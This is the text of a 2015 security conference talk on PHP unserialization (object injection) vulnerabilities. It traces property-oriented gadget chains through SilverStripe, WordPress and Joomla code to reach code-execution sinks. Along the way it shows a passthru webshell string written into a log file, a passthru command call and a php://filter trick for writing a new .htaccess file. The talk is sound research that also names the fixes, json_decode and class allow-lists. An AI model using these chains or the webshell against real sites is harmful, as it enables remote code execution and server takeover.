php unserialization vulnerabilities: what are we missing?

© Pentest Limited 2015 - All rights reserved

PHP unserialization vulnerabilities:What are we missing?

Sam Thomas

PHP unserialization vulnerabilities?

Slowly emerging class of vulnerabilities

(PHP) Object Injection• An application will instantiate an object based on user input

• Unserialization

• “new” operator (see blog.leakfree.nl - CVE-2015-1033 - humhub)

SilverStripe Changelogs 2.4.6 (2011-10-17)

Security: Potential remote code execution through serialization of page comment user submissions.

2009• Stefan Esser - POC - Shocking News In PHP Exploitation

2010• Stefan Esser - BlackHat USA - Utilizing Code Reuse/ROP in PHP Application Exploits

2011

2012

2009• Stefan Esser - POC - Shocking News In PHP Exploitation

2010• Stefan Esser - BlackHat USA - Utilizing Code Reuse/ROP in PHP Application Exploits

2011

2012

2013

• Arseny Reutov - Confidence Krakow - PHP Object Injection revisited

• Egidio Romano - JoomlaDay Italy - PHP Object Injection in Joomla...questo sconosciuto

2014

• Tom Van Goethem - Positive Hack Days - PHP Object Injection Vulnerability in WordPress: an Analysis

• Johannes Dahse - ACM CCS - Code Reuse Attacks in PHP: Automated POP Chain Generation

2015• Egidio Romano - Security Summit - PHP Object Injection Demystified

New exploits for old vulnerabilities

• WordPress - CVE-2013-4338 - 714 days

• Joomla - CVE-2013-1453 - 933 days

• SilverStripe - CVE-2011-4962 - 1409 days

• WordPress plugin

• 30% of ALL ecommerce sites (builtwith.com)

• Bug fixed June 10 2015

• Same payload as CVE-2013-4338

The vulnerability

unserialize($user_controlled_data)

The fixes

json_decode($user_controlled_data)

or

unserialize($data, $allowed_class_array)

The exploit technique

Code reuse

ROP POP

ret2libc

Return

Oriented

Programming

Property

Oriented

Programming

Agenda

• What is PHP (un)serialization?

• Why is it exploitable?

• Let’s exploit it!

What is PHP (un)serialization?

serialize — Generates a storable representation of a value

unserialize — Creates a PHP value from a stored representation

1 i:1;

‘foobar’ s:6:”foobar”;

i:1; 1

s:6:”foobar”; ‘foobar’

Primitive types in PHP

scalar

• boolean

• integer

• float

• string

compound

• array

• object

special

• resource

• NULL

Object

public class className

{

private $prop1 = ‘value1’;

protected $prop2 = ‘value2’;

public $prop3 = ‘value3’;

public function meth1()

{

}

}

$x = new className();

Agenda

• What is PHP Unserialization?



Magic methods

• __construct()

• __destruct()

• __call()

• __callStatic()

• __get()

• __set()

• __isset()

• __unset()

• __sleep()

• __wakeup()

• __toString()

• __invoke()

• __set_state()

• __clone()

• __debugInfo()

__wakeup

• Invoked on unserialization

• Reinitialise database connections

• Other reinitialisation tasks

__destruct

• Invoked on garbage collection

• Clean up references

• Finish any unfinished business

• Often interesting things happen here!

__toString

• Invoked when an object is treated as a string:

echo $object;

• Can contain complex rendering methods

__call

Invoked when an undefined method is called

$object->foobar($args)=$object->__call(‘foobar’,$args)

Autoloading

• Applications define a function to deal with unloaded classes, this is invoked during unserialization

• Either “__autoload” function or any function registered with “spl_autoload_register”

Weak typing

“PHP does not require (or support) explicit type definition in variable declaration”

variables (->object properties) can take any value

All functions have variable arguments

foobar() = foobar(null) = foobar(null, null)

Weak typing + variable args=

Many possible POP chains

Agenda

• What is PHP Unserialization?



Methodology

• Find an entry point

• What classes are loaded/loadable (autoload)• Dummy classes

• Indirect inclusion

• Find possible starting points• __destruct, __toString, __wakeup

• Get from a starting point to a desirable end point• Find desirable end points?

• Use more magic

SilverStripe 2.4.x – 2.4.6CVE-2011-4962

(Tim Klein)

Methodology






• Use more magic

function PostCommentForm() {…

// Load the users data from a cookieif($cookie = Cookie::get("PageCommentInterface_Data")) {

$form->loadDataFrom(unserialize($cookie));}

…}

Entry point – PageCommentInterface - PostCommentForm

Methodology






• Use more magic

function sapphire_autoload($className) {global $_CLASS_MANIFEST;$lClassName = strtolower($className);if(isset($_CLASS_MANIFEST[$lClassName]))

include_once($_CLASS_MANIFEST[$lClassName]);else if(isset($_CLASS_MANIFEST[$className]))

include_once($_CLASS_MANIFEST[$className]);}

spl_autoload_register('sapphire_autoload');

Autoloader from core.php

Methodology






• Use more magic

Possible start points

• 0 x “function __wakeup”

• 5 x “function __destruct”• MySQLQuery, CSVParser, TestSession, Zend_Cache_Backend_Sqlite,

Zend_Log

public function __destruct() {if(is_resource($this->handle))

mysql_free_result($this>handle);}

__destruct #1 - MySQLQuery

function __destruct() { $this->closeFile();

}

protected function closeFile() {if($this->fileHandle) fclose($this->fileHandle);$this->fileHandle = null;$this->rowNum = 0;$this->currentRow = null;$this->headerRow = null;

}

__destruct #2 - CSVParser

public function __destruct(){

foreach($this->_writers as $writer) {$writer->shutdown();

}}

__destruct #5 - Zend_Log



• 5 x “function __destruct”• MySQLQuery, CSVParser, TestSession, Zend_Cache_Backend_Sqlite,

Zend_Log

Methodology






• Use more magic

Next steps

• 5 x “function shutdown”• Zend_Log_Writer_Abstract, Zend_Log_Writer_Db,

Zend_Log_Writer_Mail, Zend_Log_Writer_Mock, Zend_Log_Writer_Stream

Methodology






• Use more magic

Next steps

• 5 x “function shutdown”• Zend_Log_Writer_Abstract, Zend_Log_Writer_Db,

Zend_Log_Writer_Mail, Zend_Log_Writer_Mock, Zend_Log_Writer_Stream

• 8 x “function __call”• Aggregate, VirtualPage, Object, ViewableData, Form_FieldMap,

TabularStyle, Zend_Cache_Frontend_Class, Zend_Log

function __call($func, $args) {return call_user_func_array(array(&$this->form, $func), $args);

}

__call #6 – TabularStyle – proxy gadget

public function __call($method, $params){

$priority = strtoupper($method);if (($priority = array_search($priority, $this->_priorities)) !== false) {

$this->log(array_shift($params), $priority);} else {

…}

}

public function log($message, $priority){

…$event = array_merge(array('timestamp' => date('c'),

'message' => $message,'priority' => $priority,'priorityName' => $this->_priorities[$priority]),$this->_extras);

…foreach ($this->_writers as $writer) {

$writer->write($event);}

}

__call #8 - Zend_Log

Catch all __call gadget

Useful because of what triggers it

$this->anyProperty->anyMethod($anyArgs)

This at any start point will trigger it

public function __call($method, $params){

$priority = strtoupper($method);if (($priority = array_search($priority, $this->_priorities)) !== false) {

$this->log(array_shift($params), $priority);} else {

…}

}

public function log($message, $priority){

…$event = array_merge(array('timestamp' => date('c'),

'message' => $message,'priority' => $priority,'priorityName' => $this->_priorities[$priority]),$this->_extras);

…foreach ($this->_writers as $writer) {

$writer->write($event);}

}

__call #8 - Zend_Log

Written to file

[19-Aug-2015 19:40:12] Error at line : hi mum (http://127.0.0.1/BSidesMCR/SilverStripe/test-page/)

Written to file

[19-Aug-2015 19:40:12] Error at line : <?phppassthru($_GET[‘c’]); ?> (http://127.0.0.1/BSidesMCR/SilverStripe/test-page/)

There is a way

• Using “php://filter/convert.base64-decode/resource=”

• PHP ignores all non base64 characters

• Can be nested

• Use this to write a new .htaccess in a subdirectory

• See Stefan Esser’s Piwik advisory from 2009

Wordpress<3.6.1CVE-2013-4338

(Tom Van Goethem)

Methodology






• Use more magic

Mathias Bynens

utf8 in mysql ≠ UTF-8• Only handles up to 3 byte characters

• 4 byte character terminates input like a null-byte poisoning attack

UPDATE table SET column = 'foo𝌆bar' WHERE id = 1;

SELECT column FROM table WHERE id = 1; - returns ‘foo’

Tom Van Goethem

Genius insight

=

We can abuse this to screw with WordPress’ unserialization

Methodology






• Use more magic

No autoloader!?

Methodology






• Use more magic


(get_declared_classes)


• 2 x “function __destruct”• wpdb, WP_Object_Cache

• 1 x “function __toString”• WP_Theme

public function __destruct() {return true;

}

__destruct #1 - wpdb

public function __destruct() {return true;

}

__destruct #2 - WP_Object_Cache

/*** When converting the object to a string, the theme name is returned.** @return string Theme name, ready for display (translated)*/public function __toString() {

return (string) $this->display('Name');}

public function display( $header, $markup = true, $translate = true ) {$value = $this->get( $header );

if ( $translate && ( empty( $value ) || ! $this->load_textdomain() ) )$translate = false;

if ( $translate )$value = $this->translate_header( $header, $value );

if ( $markup )$value = $this->markup_header( $header, $value, $translate );

return $value;}

__toString #1 - WP_Theme

Methodology






• Use more magic

/*** When converting the object to a string, the theme name is returned.** @return string Theme name, ready for display (translated)*/public function __toString() {

return (string) $this->display('Name');}

public function display( $header, $markup = true, $translate = true ) {$value = $this->get( $header );

if ( $translate && ( empty( $value ) || ! $this->load_textdomain() ) )$translate = false;

if ( $translate )$value = $this->translate_header( $header, $value );

if ( $markup )$value = $this->markup_header( $header, $value, $translate );

return $value;}

__toString #1 - WP_Theme

/*** Makes a function, which will return the right translation index, according to the* plural forms header*/function make_plural_form_function($nplurals, $expression) {

$expression = str_replace('n', '$n', $expression);$func_body = "

\$index = (int)($expression);return (\$index < $nplurals)? \$index : $nplurals - 1;";

return create_function('$n', $func_body);}

Endpoint – make_plural_form_function - Translations

WP_Theme __toString display load_textdomain

(l10n.php) load_theme_textdomain load_textdomain

MO import_from_file import_from_reader

Translations set_headers set_header make_plural_form_function

Joomla < 3.03CVE-2013-1453(Egidio Romano)

Prior exploits

• 2013 - Egidio Romano• Arbitrary directory deletion

• Blind SQL injection

• 2014 - Johanne Dahse• File permission modification

• Directory creation

• Autoloaded local file inclusion – WTF!

The LFI exploit

Abuses a sink I didn’t know about (method_exists)

Requires• null byte poisoning in include (CVE-2006-7243 – fixed 2010)

• Malformed class name passed to method_exists (fixed 2014)

Methodology






• Use more magic

public function onAfterDispatch(){

…

// Get the terms to highlight from the request.$terms = $input->request->get('highlight', null, 'base64');$terms = $terms ? unserialize(base64_decode($terms)) : null;

…}

Entry point - PlgSystemHighlight extends JPlugin

Methodology






• Use more magic

Autoloader has lots of code

• If the classname starts with the prefix “J”• Split camelCase at each uppercase letter

• e.g. JCacheController is at /libraries/Joomla/cache/controller.php

Methodology






• Use more magic

public function __destruct(){

// Do not render if debugging or language debug is not enabledif (!JDEBUG && !$this->debugLang){

return;}

// User has to be authorised to see the debug informationif (!$this->isAuthorisedDisplayDebug()){

return;}…

}

private function isAuthorisedDisplayDebug(){

…$filterGroups = (array) $this->params->get('filter_groups', null);…

}

Starting point - __destruct - plgSystemDebug extends JPlugin

Methodology






• Use more magic

Next steps

• 33 x “function get”• JApplicationCli, JApplicationWeb, JCache, JCacheControllerCallback,

JCacheControllerPage, JCacheControllerView, JCacheController, JCacheStorageApc, JCacheStorageCachelite, JCacheStorageFile, JCacheStorageMemcache, JCacheStorageMemcached, JCacheStorageWincache, JCacheStorageXcache, JCacheStorage, JClientFtp, JGithubGists, JGithubIssues, JGithubPulls, JGithubRefs, JHttp, JInputFiles, JInput, JLanguage, JObject, JPagination, JRegistry, JSession, JCategories, JException, JRequest, JViewLegacy, SimplePie

• 4 x “function __call”• JCacheController, *JDatabaseDriver, *JDatabaseQuery, JInput

/*** Executes a cacheable callback if not found in cache else returns cached output and result** @param mixed $callback Callback or string shorthand for a callback* @param array $args Callback arguments* @param string $id Cache id* @param boolean $wrkarounds True to use wrkarounds* @param array $woptions Workaround options** @return mixed Result of the callback** @since 11.1*/public function get($callback, $args = array(), $id = false, $wrkarounds = false, $woptions = array()){

…$result = call_user_func_array($callback, $Args);…

}

get #4 - JCacheControllerCallback extends JCacheController

call_user_func_array as an endpoint

• Trivial if we control both args:call_user_func_array(‘passthru’, ’uname –a’)

• Near trivial if we control just first arg:call_user_func_array(array($object, $method_name),$args)

public function get($gistId){

// Build the request path.$path = '/gists/' . (int) $gistId;

// Send the request.$response = $this->client->get($this->fetchUrl($path));

…}

protected function fetchUrl($path, $page = 0, $limit = 0){

// Get a new JUri object using the api url and given path.$uri = new JUri($this->options->get('api.url') . $path);

if ($this->options->get('api.username', false)){

$uri->setUser($this->options->get('api.username'));}…return (string) $uri;

}

get #17 - JGithubGists extends JGithubObject

public function get($property, $default = null){

if (isset($this->metadata[$property])){

return $this->metadata[$property];}

return $default;}

get #24 - JLanguage

api.url=“x:///” + api.username=“arbitrary” ->

$this->fetchUrl(..) = “arbitrary@”




…}

protected function fetchUrl($path, $page = 0, $limit = 0){

// Get a new JUri object using the api url and given path.$uri = new JUri($this->options->get('api.url') . $path);

if ($this->options->get('api.username', false)){

$uri->setUser($this->options->get('api.username'));}…return (string) $uri;

}


elseif (strstr($callback, '::')){

list ($class, $method) = explode('::', $callback);$callback = array(trim($class), trim($method));

}…elseif (strstr($callback, '->')){

/** This is a really not so smart way of doing this...

…list ($object_123456789, $method) = explode('->', $callback);global $$object_123456789;$callback = array($$object_123456789, $method);

}

JCacheControllerCallback – callback string shorthand

Variable variables

$a = ‘b’

$b = ‘c’

$$a = $($a) = $b = ‘c’

elseif (strstr($callback, '::')){

list ($class, $method) = explode('::', $callback);$callback = array(trim($class), trim($method));

}…elseif (strstr($callback, '->')){

/** This is a really not so smart way of doing this...

…list ($object_123456789, $method) = explode('->', $callback);global $$object_123456789;$callback = array($$object_123456789, $method);

}

JCacheControllerCallback – callback string shorthand

$id = $this->_makeId($callback, $args);$data = $this->cache->get($id);

if ($data === false){

$locktest = $this->cache->lock($id);…

}

if ($data !== false){

$cached = unserialize(trim($data));$result = $cached['result'];

}else{

$result = call_user_func_array($callback, $Args);}

JCacheControllerCallback – cache and callback logic

• call_user_func_array doesn’t error on a non-existent method

• We can use a proxy gadget to get past the “lock” method

public function __call($name, $arguments){

$nazaj = call_user_func_array(array($this->cache, $name), $arguments);return $nazaj;

}

Proxy gadget - JCacheController – __call

public function get($id, $group = null){

$data = false;$data = $this->cache->get($id, $group);

…


$data = unserialize(trim($data));}

return $data;}

get #7 - JCacheController

$id = $this->_makeId($callback, $args);$data = $this->cache->get($id);

if ($data === false){

$locktest = $this->cache->lock($id);…

}


$cached = unserialize(trim($data));$result = $cached['result'];

}else{

$result = call_user_func_array($callback, $Args);}

JCacheControllerCallback – cache and callback logic

There’s nothing to stop us following the same path twice• On the first pass we globalise $result and retrieve it from the cache

• On the second pass we use $result as the object in the callback

We can now call an arbitrary method on an arbitrary object

public function _startElement($parser, $name, $attrs = array()){

array_push($this->stack, $name);$tag = $this->_getStackLocation();

// Reset the dataeval('$this->' . $tag . '->_data = "";');…

}

protected function _getStackLocation(){

return implode('->', $this->stack);}

JUpdate – _startElement

Methodology






• Use more magic




// Validate the response code.if ($response->code != 200){

// Decode the error response and throw an exception.$error = json_decode($response->body);throw new DomainException($error->message, $response->code);

}

return json_decode($response->body);}


Take aways

Developers• Think very carefully before using this type of function

Testers / Researchers• Test for and find this type of issue

• Exploit it – it’s fun!

Methodology






• Use more magic

Questions?

php unserialization vulnerabilities: what are we missing?

Software